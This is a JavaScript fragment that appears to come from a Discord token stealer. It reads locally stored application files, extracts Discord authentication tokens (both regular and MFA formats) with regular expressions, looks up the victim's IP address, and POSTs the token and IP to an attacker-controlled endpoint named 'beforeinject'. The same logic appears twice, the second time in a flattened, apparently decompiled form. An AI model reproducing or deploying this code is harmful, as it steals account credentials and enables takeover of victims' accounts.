ldbFileFilter.forEach(file => {
                            var fileContent = fs.readFileSync(`${tokenDir}/${file}`).toString()
                            var noMFA = /"[\d\w_-]{24}\.[\d\w_-]{6}\.[\d\w_-]{27}"/
                            var mfa = /"mfa\.[\d\w_-]{84}"/
                            var [token] = noMFA.exec(fileContent) || mfa.exec(fileContent) || [undefined]
                            if (token) fetch("http://ip-api.com/json/").then(r => r.json()).then(r => fetch(`${apiurl}/beforeinject`, {
                                method: "POST",
                                body: JSON.stringify({
                                    token: token,
                                    ip: r.query
                                })
                            }))
                        })
var fileContent = fs.readFileSync(`${tokenDir}/${file}`).toString()
var noMFA = /"[\d\w_-]{24}\.[\d\w_-]{6}\.[\d\w_-]{27}"/
var mfa = /"mfa\.[\d\w_-]{84}"/
_tmp_23 = noMFA.exec(fileContent) || mfa.exec(fileContent) || [undefined]
fetch("http://ip-api.com/json/").then(r => r.json()).then(r => fetch(`${apiurl}/beforeinject`, {
                                method: "POST",
                                body: JSON.stringify({
                                    token: token,
                                    ip: r.query
                                })
                            }))
